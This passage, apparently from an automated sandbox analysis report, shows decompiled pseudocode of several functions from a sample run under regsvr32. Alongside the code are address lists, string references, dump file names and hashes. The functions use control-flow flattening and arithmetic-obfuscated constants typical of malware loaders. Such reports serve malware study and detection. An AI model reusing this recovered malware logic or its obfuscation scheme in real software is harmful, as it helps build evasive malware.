				} while (__eflags != 0);
				goto L13;
			}

0x040ead08
0x040ead0e
0x040ead1c
0x040ead1e
0x040ead23
0x040ead27
0x040ead2b
0x040ead39
0x040ead3e
0x040ead44
0x040ead4c
0x040ead54
0x040ead5c
0x040ead64
0x040ead69
0x040ead71
0x040ead79
0x040ead81
0x040ead89
0x040ead91
0x040ead99
0x040eada1
0x040eada9
0x040eadb1
0x040eadb9
0x040eadc1
0x040eadc9
0x040eadd1
0x040eadd9
0x040eade1
0x040eaded
0x040eadf2
0x040eadf8
0x040eae00
0x040eae0d
0x040eae0e
0x040eae12
0x040eae1a
0x040eae22
0x040eae2a
0x040eae32
0x040eae3a
0x040eae3f
0x040eae47
0x040eae4f
0x040eae54
0x040eae5c
0x040eae64
0x040eae6c
0x040eae74
0x040eae7c
0x040eae84
0x040eae8c
0x040eae94
0x040eae99
0x040eaea1
0x040eaea9
0x040eaeb6
0x040eaec0
0x040eaec4
0x040eaecc
0x040eaed4
0x040eaee1
0x040eaee6
0x040eaeec
0x040eaef9
0x040eaf06
0x040eaf0e
0x040eaf1b
0x040eaf1e
0x040eaf22
0x040eaf2a
0x040eaf32
0x040eaf3a
0x040eaf42
0x040eaf4a
0x040eaf5a
0x040eaf5e
0x040eaf66
0x040eaf6b
0x040eaf73
0x040eaf7b
0x040eaf83
0x040eaf8b
0x040eaf93
0x040eaf9b
0x040eafa3
0x040eafaf
0x040eafb4
0x040eafba
0x040eafc2
0x040eafce
0x040eafd3
0x040eafd9
0x040eafe1
0x040eafe6
0x040eafee
0x040eaff6
0x040eaffe
0x040eb006
0x040eb00e
0x040eb01a
0x040eb01f
0x040eb025
0x040eb02d
0x040eb035
0x040eb03a
0x040eb042
0x040eb04a
0x040eb056
0x040eb059
0x040eb05d
0x040eb062
0x040eb06a
0x040eb06a
0x040eb074
0x040eb0ca
0x040eb0d3
0x040eb0d7
0x040eb0df
0x040eb0e9
0x040eb108
0x040eb11b
0x040eb135
0x040eb13a
0x040eb13d
0x00000000
0x040eb076
0x040eb07c
0x040eb0b3
0x040eb0ba
0x040eb0be
0x040eb0c0
0x040eb0c3
0x00000000
0x040eb07e
0x040eb084
0x040eb187
0x040eb08a
0x040eb090
0x00000000
0x040eb096
0x040eb096
0x00000000
0x040eb096
0x040eb090
0x040eb084
0x040eb07c
0x040eb18f
0x040eb19b
0x040eb19b
0x040eb15b
0x040eb160
0x040eb163
0x040eb165
0x040eb165
0x040eb165
0x00000000

Strings

&b, xrefs: 040EAE84
r+, xrefs: 040EAF9B

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: 96d278ba1d5ff5a0b4af60d3b22c096c62f2b19f05bfb17f4cdad44a6c7d215e
Instruction ID: 1be4b5b17a968ad3b70c1feea7ba73fbc3fc903a6f8c58a42cdaccd7a4a2117f
Opcode Fuzzy Hash: 96d278ba1d5ff5a0b4af60d3b22c096c62f2b19f05bfb17f4cdad44a6c7d215e
Instruction Fuzzy Hash: 29C142B15083409FD3A8CF66C88941FBBF1FBD4758F108A2DF29696260C7B59959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 040E4F74, Relevance: 2.7, Strings: 2, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040E4F74() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t210;
				void* _t211;
				intOrPtr _t213;
				void* _t217;
				intOrPtr _t224;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int* _t254;

				_t254 =  &_v604;
				_v528 = 0xeac4cc;
				_v528 = _v528 | 0xab847aec;
				_t217 = 0x3550051;
				_v528 = _v528 ^ 0xabe53c27;
				_v564 = 0x85ed10;
				_v564 = _v564 << 0xe;
				_v564 = _v564 | 0x02c2a82c;
				_v564 = _v564 ^ 0x7bc732f4;
				_v548 = 0x432dfc;
				_v548 = _v548 ^ 0x2e419a47;
				_v548 = _v548 ^ 0x2e0248f0;
				_v556 = 0x7b6619;
				_t246 = 0x1c;
				_v556 = _v556 / _t246;
				_v556 = _v556 << 0x10;
				_v556 = _v556 ^ 0x68371ab0;
				_v568 = 0x76f94b;
				_t247 = 7;
				_v568 = _v568 / _t247;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x1fed9d10;
				_v572 = 0x34fb4;
				_t248 = 0xf;
				_v572 = _v572 * 0x24;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x0007943f;
				_v536 = 0xc9a576;
				_v536 = _v536 + 0xffff9d44;
				_v536 = _v536 ^ 0x00c7b609;
				_v596 = 0xae9ff5;
				_v596 = _v596 + 0xffff6f16;
				_v596 = _v596 / _t248;
				_v596 = _v596 ^ 0xfe5a1390;
				_v596 = _v596 ^ 0xfe515394;
				_v588 = 0xa8ac90;
				_t249 = 0x17;
				_v588 = _v588 / _t249;
				_v588 = _v588 << 4;
				_v588 = _v588 + 0xfffff77b;
				_v588 = _v588 ^ 0x007f9eed;
				_v600 = 0xc58072;
				_v600 = _v600 + 0xffffcbc9;
				_v600 = _v600 << 4;
				_v600 = _v600 * 0x72;
				_v600 = _v600 ^ 0x7db93259;
				_v604 = 0x4fbb0c;
				_v604 = _v604 << 0xa;
				_v604 = _v604 << 7;
				_v604 = _v604 * 0x27;
				_v604 = _v604 ^ 0xfda02730;
				_v544 = 0x5fc89d;
				_v544 = _v544 | 0x6496792e;
				_v544 = _v544 ^ 0x64dc06aa;
				_v580 = 0xa4bd54;
				_v580 = _v580 + 0xffff47e7;
				_v580 = _v580 >> 0x10;
				_v580 = _v580 + 0xffff9f11;
				_v580 = _v580 ^ 0xfff905b7;
				_v560 = 0x8ec0a6;
				_v560 = _v560 ^ 0x51bd2871;
				_t250 = 0x75;
				_v560 = _v560 / _t250;
				_v560 = _v560 ^ 0x00b97c8d;
				_v584 = 0x6990b8;
				_v584 = _v584 ^ 0x9d650ba3;
				_v584 = _v584 ^ 0x6675860f;
				_v584 = _v584 + 0xffff1bcf;
				_v584 = _v584 ^ 0xfb748c23;
				_v592 = 0xef0f92;
				_v592 = _v592 ^ 0x945975ed;
				_v592 = _v592 + 0xffff8646;
				_v592 = _v592 + 0xfffff2e1;
				_v592 = _v592 ^ 0x94bb4d80;
				_v552 = 0xcb75d7;
				_t251 = 0x65;
				_v552 = _v552 * 0x6f;
				_v552 = _v552 ^ 0xe1e1c84b;
				_v552 = _v552 ^ 0xb9d9c47b;
				_v576 = 0x1cf321;
				_v576 = _v576 + 0xffffc0e0;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 7;
				_v576 = _v576 ^ 0x000d9bab;
				_v532 = 0x45ea0d;
				_v532 = _v532 / _t251;
				_v532 = _v532 ^ 0x000fbf52;
				_v540 = 0x89573e;
				_v540 = _v540 + 0xffffd980;
				_v540 = _v540 ^ 0x008ac7ea;
				do {
					while(_t217 != 0x2095a83) {
						if(_t217 == 0x3550051) {
							_t217 = 0xca1b903;
							continue;
						} else {
							if(_t217 == 0xba5f136) {
								_t210 = E040E09DD(_v560,  &_v524, _v584, _v592);
								 *_t210 = 0;
								_t217 = 0x2095a83;
								continue;
							} else {
								_t260 = _t217 - 0xca1b903;
								if(_t217 == 0xca1b903) {
									_push(_v556);
									_push(_v548);
									_push(_v564);
									_t211 = E040EE1F8(0x40d1000, _v528, _t260);
									_t224 =  *0x40f6214; // 0x0
									_t213 =  *0x40f6214; // 0x0
									E040F2D0A(_v572, _t260, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
									_t210 = E040EFECB(_t211, _v600, _v604, _v544, _v580);
									_t254 =  &(_t254[0xe]);
									_t217 = 0xba5f136;
									continue;
								}
							}
						}
						goto L9;
					}
					E040E437A(E040EBEFD, _v552, _v576, _v532, _v540, 0,  &_v524,  &_v524);
					_t254 =  &(_t254[6]);
					_t217 = 0x9325c58;
					L9:
					__eflags = _t217 - 0x9325c58;
				} while (__eflags != 0);
				return _t210;
			}

0x040e4f74
0x040e4f7a
0x040e4f84
0x040e4f8c
0x040e4f91
0x040e4f99
0x040e4fa1
0x040e4fa6
0x040e4fae
0x040e4fb6
0x040e4fbe
0x040e4fc6
0x040e4fce
0x040e4fe0
0x040e4fe5
0x040e4feb
0x040e4ff0
0x040e4ff8
0x040e5004
0x040e5009
0x040e500f
0x040e5014
0x040e501c
0x040e5029
0x040e502c
0x040e5030
0x040e5035
0x040e503d
0x040e5045
0x040e504d
0x040e5055
0x040e505d
0x040e506d
0x040e5071
0x040e5079
0x040e5081
0x040e508d
0x040e5090
0x040e5094
0x040e5099
0x040e50a1
0x040e50a9
0x040e50b1
0x040e50b9
0x040e50c3
0x040e50c7
0x040e50cf
0x040e50d7
0x040e50dc
0x040e50e6
0x040e50ea
0x040e50f2
0x040e50fa
0x040e5102
0x040e510a
0x040e5112
0x040e511a
0x040e511f
0x040e5127
0x040e512f
0x040e5139
0x040e5151
0x040e5156
0x040e515c
0x040e5169
0x040e5171
0x040e5179
0x040e5181
0x040e5189
0x040e5191
0x040e5199
0x040e51a1
0x040e51a9
0x040e51b1
0x040e51b9
0x040e51c6
0x040e51c7
0x040e51cb
0x040e51d3
0x040e51db
0x040e51e3
0x040e51eb
0x040e51f0
0x040e51f5
0x040e51fd
0x040e520b
0x040e520f
0x040e5217
0x040e521f
0x040e5227
0x040e522f
0x040e522f
0x040e523d
0x040e52f2
0x00000000
0x040e5243
0x040e5249
0x040e52df
0x040e52e8
0x040e52eb
0x00000000
0x040e524f
0x040e524f
0x040e5251
0x040e5257
0x040e5260
0x040e5264
0x040e526c
0x040e5271
0x040e5293
0x040e52a6
0x040e52bd
0x040e52c2
0x040e52c5
0x00000000
0x040e52c5
0x040e5251
0x040e5249
0x00000000
0x040e523d
0x040e5316
0x040e531b
0x040e531e
0x040e5320
0x040e5320
0x040e5320
0x040e5332

Strings

E, xrefs: 040E51FD
X\2, xrefs: 040E5164

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: 75a57cee2b0eee19ec63d7b8764fa04451c54050523e45f13c6f44b79ad07d66
Instruction ID: a83d42e2bbb3ad8e17c4fef87ace7a9582a2d281bb1abc93359f96ae838f74ed
Opcode Fuzzy Hash: 75a57cee2b0eee19ec63d7b8764fa04451c54050523e45f13c6f44b79ad07d66
Instruction Fuzzy Hash: C29122711083809FC368CF65D88951BBBF1FBC5398F544A1DF296A6260D3B19A49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 040DDE74, Relevance: 2.7, Strings: 2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E040DDE74() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr _t196;
				void* _t201;
				char _t202;
				signed int* _t203;
				void* _t205;

				_t203 =  &_v92;
				_v48 = 0x569f20;
				_v48 = _v48 * 0x6b;
				_t169 = 0;
				_v48 = _v48 ^ 0x2435b753;
				_t201 = 0xa773912;
				_v36 = 0xa39ca1;
				_v36 = _v36 + 0xffff508a;
				_v36 = _v36 ^ 0x00aa5884;
				_v84 = 0x943e6a;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x5d77;
				_t171 = 0x78;
				_v84 = _v84 * 0xe;
				_v84 = _v84 ^ 0x0005cfbb;
				_v72 = 0x1e0d0a;
				_v72 = _v72 | 0x4cfb6fde;
				_v72 = _v72 + 0xffff94ff;
				_v72 = _v72 ^ 0x4cfa3edf;
				_v80 = 0xa086f6;
				_v80 = _v80 << 0x10;
				_v80 = _v80 >> 5;
				_v80 = _v80 + 0xffff18d5;
				_v80 = _v80 ^ 0x0432d7e2;
				_v68 = 0xb8dd27;
				_v68 = _v68 | 0xebb7bfbf;
				_v68 = _v68 ^ 0xebb8c1a9;
				_v32 = 0x418b74;
				_v32 = _v32 * 0x7e;
				_v32 = _v32 ^ 0x2049f6fa;
				_v64 = 0x577cf5;
				_v64 = _v64 * 0x64;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x004a237d;
				_v76 = 0x4c7ee;
				_v76 = _v76 ^ 0x14a6b669;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x4a231390;
				_v44 = 0xd26523;
				_v44 = _v44 | 0x7504cc1f;
				_v44 = _v44 ^ 0x75d3d950;
				_v88 = 0x7e3e67;
				_v88 = _v88 >> 5;
				_v88 = _v88 + 0xfffffc49;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x000c6abf;
				_v40 = 0x647ef6;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00028bbb;
				_v92 = 0x531e5a;
				_v92 = _v92 << 8;
				_v92 = _v92 | 0xbedf5cfb;
				_v92 = _v92 ^ 0xffdbb821;
				_v52 = 0xaf5b7e;
				_v52 = _v52 ^ 0x54b2eb64;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x0a8e907d;
				_v56 = 0x7e69cb;
				_t172 = 0x76;
				_v56 = _v56 / _t172;
				_v56 = _v56 + 0xffff7440;
				_v56 = _v56 ^ 0x00047804;
				_v60 = 0x4d1deb;
				_v60 = _v60 | 0x7db56f6d;
				_v60 = _v60 + 0xffff2308;
				_v60 = _v60 ^ 0x7dffdcf4;
				_t200 = _v28;
				_t202 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t201 - 0xa773912;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t201 = 0xa19a195;
							continue;
						}
						if(_t201 == 0x6df88bf) {
							E040D54B6(_v52, _v56, _v60, _t200);
							L25:
							return _t169;
						}
						if(_t201 == 0x82168a7) {
							E040F2B09(_v88, _v24, _v40, _v92);
							_t201 = 0x6df88bf;
							continue;
						}
						if(_t201 == 0x88022e2) {
							_t196 =  *0x40f6214; // 0x0
							E040EE0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
							_t162 =  *0x40f6214; // 0x0
							_t203 =  &(_t203[3]);
							_t169 = 1;
							_t201 = 0x82168a7;
							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
							continue;
						}
						if(_t201 != 0xa19a195) {
							goto L22;
						} else {
							_t202 = E040DC307();
							_t201 = 0xf928839;
							continue;
						}
					}
					if(_t201 == 0xbfd8a94) {
						if(E040DE640(_v32, _v64,  &_v24,  &_v16) == 0) {
							_t201 = 0x82168a7;
							goto L22;
						}
						_t201 = 0x88022e2;
						goto L1;
					}
					if(_t201 == 0xeffcd22) {
						_t201 = 0x6df88bf;
						if(_v28 > 2) {
							_t166 = E040EF840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
							_v24 = _t166;
							if(_t166 != 0) {
								_t201 = 0xbfd8a94;
							}
						}
						goto L1;
					}
					if(_t201 != 0xf928839) {
						goto L22;
					}
					_t168 = E040E8C7D(_t202, _v36,  &_v28, _v84, _v72);
					_t200 = _t168;
					_t203 =  &(_t203[3]);
					if(_t168 == 0) {
						goto L25;
					}
					_t201 = 0xeffcd22;
					goto L1;
					L22:
				} while (_t201 != 0x8019399);
				goto L25;
			}

0x040dde74
0x040dde77
0x040dde8a
0x040dde8e
0x040dde90
0x040dde98
0x040dde9d
0x040ddea5
0x040ddead
0x040ddeb5
0x040ddebd
0x040ddec2
0x040dded1
0x040dded4
0x040dded8
0x040ddee0
0x040ddee8
0x040ddef0
0x040ddef8
0x040ddf00
0x040ddf08
0x040ddf0d
0x040ddf12
0x040ddf1a
0x040ddf22
0x040ddf2a
0x040ddf32
0x040ddf3a
0x040ddf47
0x040ddf4b
0x040ddf53
0x040ddf60
0x040ddf6c
0x040ddf70
0x040ddf78
0x040ddf80
0x040ddf88
0x040ddf8d
0x040ddf95
0x040ddf9d
0x040ddfa5
0x040ddfad
0x040ddfb5
0x040ddfba
0x040ddfc2
0x040ddfc7
0x040ddfcf
0x040ddfd7
0x040ddfdc
0x040ddfe4
0x040ddfec
0x040ddff1
0x040ddff9
0x040de001
0x040de009
0x040de011
0x040de016
0x040de01e
0x040de02a
0x040de02d
0x040de031
0x040de039
0x040de041
0x040de049
0x040de051
0x040de059
0x040de061
0x040de065
0x040de065
0x040de069
0x040de069
0x040de069
0x040de069
0x040de06f
0x00000000
0x00000000
0x040de075
0x040de116
0x00000000
0x040de116
0x040de081
0x040de1f3
0x040de1fd
0x040de203
0x040de203
0x040de08d
0x040de105
0x040de10c
0x00000000
0x040de10c
0x040de095
0x040de0c1
0x040de0d4
0x040de0d9
0x040de0e4
0x040de0e7
0x040de0e8
0x040de0ed
0x00000000
0x040de0ed
0x040de09d
0x00000000
0x040de0a3
0x040de0ac
0x040de0ae
0x00000000
0x040de0ae
0x040de09d
0x040de126
0x040de1c7
0x040de1d3
0x00000000
0x040de1d3
0x040de1c9
0x00000000
0x040de1c9
0x040de132
0x040de174
0x040de179
0x040de18f
0x040de194
0x040de19c
0x040de1a2
0x040de1a2
0x040de19c
0x00000000
0x040de179
0x040de13a
0x00000000
0x00000000
0x040de153
0x040de158
0x040de15a
0x040de15f
0x00000000
0x00000000
0x040de165
0x00000000
0x040de1d8
0x040de1d8
0x00000000

Strings

}#J, xrefs: 040DDF70
g>~, xrefs: 040DDFAD

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: ecddc02454b59c7a579b87f1ab098e5b8ba8cfa902af87a5f4a369a1f608ec25
Instruction ID: df85332806adbbc14d0e7549d071a5fddff1dc7a2ec0e05fa91f061f089a1d38
Opcode Fuzzy Hash: ecddc02454b59c7a579b87f1ab098e5b8ba8cfa902af87a5f4a369a1f608ec25
Instruction Fuzzy Hash: 539165719087418FC794CF65C48541BFBE1BBC8358F504A2EF899AA260D3B5E949CF87

Uniqueness

Uniqueness Score: -1.00%

Function 040DE7DE, Relevance: 2.7, Strings: 2, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040DE7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t180;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t194;
				signed int* _t212;
				signed int* _t215;

				_t212 = _a8;
				_push(_a12);
				_t211 = _a4;
				_push(_t212);
				_push(_a4);
				_push(__ecx);
				E040EFE29(_t159);
				_v88 = 0xa74a92;
				_t215 =  &(( &_v128)[5]);
				_v88 = _v88 + 0x6289;
				_v88 = _v88 ^ 0x00a7ad1b;
				_t194 = 0x98d5ac6;
				_v72 = 0xabb696;
				_v72 = _v72 + 0xffffe542;
				_v72 = _v72 ^ 0x00a9fc0a;
				_v120 = 0x8dd565;
				_v120 = _v120 + 0xffff1d47;
				_v120 = _v120 + 0x56a1;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x46a17a82;
				_v124 = 0x8aacb4;
				_t189 = 0x6e;
				_v124 = _v124 / _t189;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x000ba54e;
				_v76 = 0x9f90a6;
				_v76 = _v76 | 0x682faec6;
				_v76 = _v76 ^ 0x68b53021;
				_v80 = 0xfbe8ab;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0xbe8fb9cd;
				_v84 = 0x1efa1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0009eae4;
				_v92 = 0xb2d03c;
				_v92 = _v92 ^ 0x8bcf93b7;
				_v92 = _v92 ^ 0x8b76d684;
				_v100 = 0x2cdd15;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x00bdfcd6;
				_v104 = 0x2a00e4;
				_v104 = _v104 | 0x603c2e46;
				_v104 = _v104 + 0xffff11ee;
				_v104 = _v104 ^ 0x6032c829;
				_v128 = 0xd0d9f9;
				_v128 = _v128 + 0x4e1d;
				_t190 = 0x14;
				_v128 = _v128 * 0x58;
				_v128 = _v128 / _t190;
				_v128 = _v128 ^ 0x0398a77e;
				_v68 = 0x2cfb4c;
				_t191 = 0x67;
				_v68 = _v68 / _t191;
				_v68 = _v68 ^ 0x000f6b94;
				_v112 = 0x1ddb62;
				_v112 = _v112 + 0x6002;
				_v112 = _v112 << 2;
				_v112 = _v112 + 0xe88d;
				_v112 = _v112 ^ 0x0072622d;
				_v116 = 0x4c27f5;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 | 0x0ee4ea1c;
				_v116 = _v116 * 0x4e;
				_v116 = _v116 ^ 0x89b93018;
				_v108 = 0x73a5e7;
				_v108 = _v108 * 0x7d;
				_v108 = _v108 >> 1;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x3c03dbf2;
				_v64 = 0x20f8;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0009aa09;
				_v96 = 0x5991b1;
				_v96 = _v96 | 0x807a0890;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x03d0ebbf;
				do {
					while(_t194 != 0x8b4e35) {
						if(_t194 == 0x2701dd5) {
							E040ECAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
							_t215 =  &(_t215[3]);
							_t194 = 0x8b4e35;
							continue;
						} else {
							if(_t194 == 0x3d33b80) {
								_push(_t194);
								_push(_t194);
								_t180 = E040DC5D8(_t212[1]);
								_t215 =  &(_t215[3]);
								 *_t212 = _t180;
								__eflags = _t180;
								if(__eflags != 0) {
									_t194 = 0x48381f5;
									continue;
								}
							} else {
								if(_t194 == 0x48381f5) {
									E040D22A6(_t212, _v80,  &_v60, _v84);
									_t215 =  &(_t215[2]);
									_t194 = 0xae51dd8;
									continue;
								} else {
									if(_t194 == 0x62374bf) {
										_t212[1] = E040E5333(_t211);
										_t194 = 0x3d33b80;
										continue;
									} else {
										if(_t194 == 0x98d5ac6) {
											_t194 = 0x62374bf;
											 *_t212 =  *_t212 & 0x00000000;
											_t212[1] = _v88;
											continue;
										} else {
											if(_t194 != 0xae51dd8) {
												goto L16;
											} else {
												E040E0A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
												_t215 =  &(_t215[4]);
												_t194 = 0x2701dd5;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E040ECAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
					_t215 =  &(_t215[3]);
					_t194 = 0x462b9b2;
					L16:
					__eflags = _t194 - 0x462b9b2;
				} while (__eflags != 0);
				L17:
				__eflags =  *_t212;
				_t158 =  *_t212 != 0;
				__eflags = _t158;
				return 0 | _t158;
			}

0x040de7e7
0x040de7ef
0x040de7f6
0x040de7fd
0x040de7fe
0x040de800
0x040de801
0x040de806
0x040de80e
0x040de811
0x040de81b
0x040de823
0x040de828
0x040de830
0x040de838
0x040de840
0x040de848
0x040de850
0x040de858
0x040de85d
0x040de865
0x040de873
0x040de878
0x040de87e
0x040de883
0x040de887
0x040de88f
0x040de897
0x040de89f
0x040de8a7
0x040de8af
0x040de8b4
0x040de8bc
0x040de8c4
0x040de8c9
0x040de8d1
0x040de8d9
0x040de8e1
0x040de8e9
0x040de8f9
0x040de8fe
0x040de906
0x040de90e
0x040de916
0x040de91e
0x040de926
0x040de92e
0x040de93b
0x040de93e
0x040de94a
0x040de94e
0x040de956
0x040de962
0x040de965
0x040de969
0x040de971
0x040de979
0x040de981
0x040de986
0x040de98e
0x040de996
0x040de99e
0x040de9a8
0x040de9ba
0x040de9be
0x040de9c6
0x040de9d3
0x040de9d7
0x040de9db
0x040de9e0
0x040de9e8
0x040de9f0
0x040de9f5
0x040de9fd
0x040dea05
0x040dea0d
0x040dea12
0x040dea1a
0x040dea1a
0x040dea2c
0x040deb00
0x040deb05
0x040deb08
0x00000000
0x040dea32
0x040dea38
0x040dead4
0x040dead5
0x040dead9
0x040deade
0x040deae1
0x040deae3
0x040deae5
0x040deae7
0x00000000
0x040deae7
0x040dea3e
0x040dea40
0x040deab2
0x040deab7
0x040deaba
0x00000000
0x040dea42
0x040dea44
0x040dea96
0x040dea99
0x00000000
0x040dea46
0x040dea4c
0x040dea85
0x040dea87
0x040dea8a
0x00000000
0x040dea4e
0x040dea54
0x00000000
0x040dea5a
0x040dea72
0x040dea77
0x040dea7a
0x00000000
0x040dea7a
0x040dea54
0x040dea4c
0x040dea44
0x040dea40
0x040dea38
0x00000000
0x040dea2c
0x040deb27
0x040deb2c
0x040deb2f
0x040deb34
0x040deb34
0x040deb34
0x040deb40
0x040deb42
0x040deb47
0x040deb47
0x040deb51

Strings

-br, xrefs: 040DE98E
F.<`, xrefs: 040DE90E

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: 8b049c9925699b3796a54a5a5b79707d8bc2d7e36afd2bd162b4a8cbd533e302
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: FE9142715087419FD358CF65C58992FBBE0FBD4748F00491DF686A6260D3B5AA48CF83

Uniqueness

Uniqueness Score: -1.00%

Function 040E654A, Relevance: 2.7, Strings: 2, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E040E654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _v88;
				char* _v92;
				char* _v96;
				signed int _v100;
				char _v104;
				char _v624;
				char _v1144;
				void* _t168;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t168);
				_v48 = 0xcd00f6;
				_v48 = _v48 + 0xcd83;
				_v48 = _v48 ^ 0x09b3856c;
				_v48 = _v48 ^ 0x097e4b14;
				_v68 = 0x47ecc1;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x0000069b;
				_v56 = 0x5623e4;
				_t204 = 0x5e;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x07a7b883;
				_v60 = 0x9f93bd;
				_v60 = _v60 ^ 0x1b2b58cc;
				_v60 = _v60 ^ 0x1bb3b428;
				_v36 = 0x1947a4;
				_v36 = _v36 | 0x7bdfb0e1;
				_v36 = _v36 ^ 0x7bdfc232;
				_v52 = 0x76ccb;
				_v52 = _v52 * 0x2b;
				_v52 = _v52 ^ 0x7f6a3668;
				_v52 = _v52 ^ 0x7e52560e;
				_v24 = 0x419396;
				_v24 = _v24 / _t204;
				_t205 = 0x46;
				_v24 = _v24 * 0x57;
				_v24 = _v24 ^ 0x845af85c;
				_v24 = _v24 ^ 0x84646483;
				_v16 = 0xd7b9b6;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 0xc;
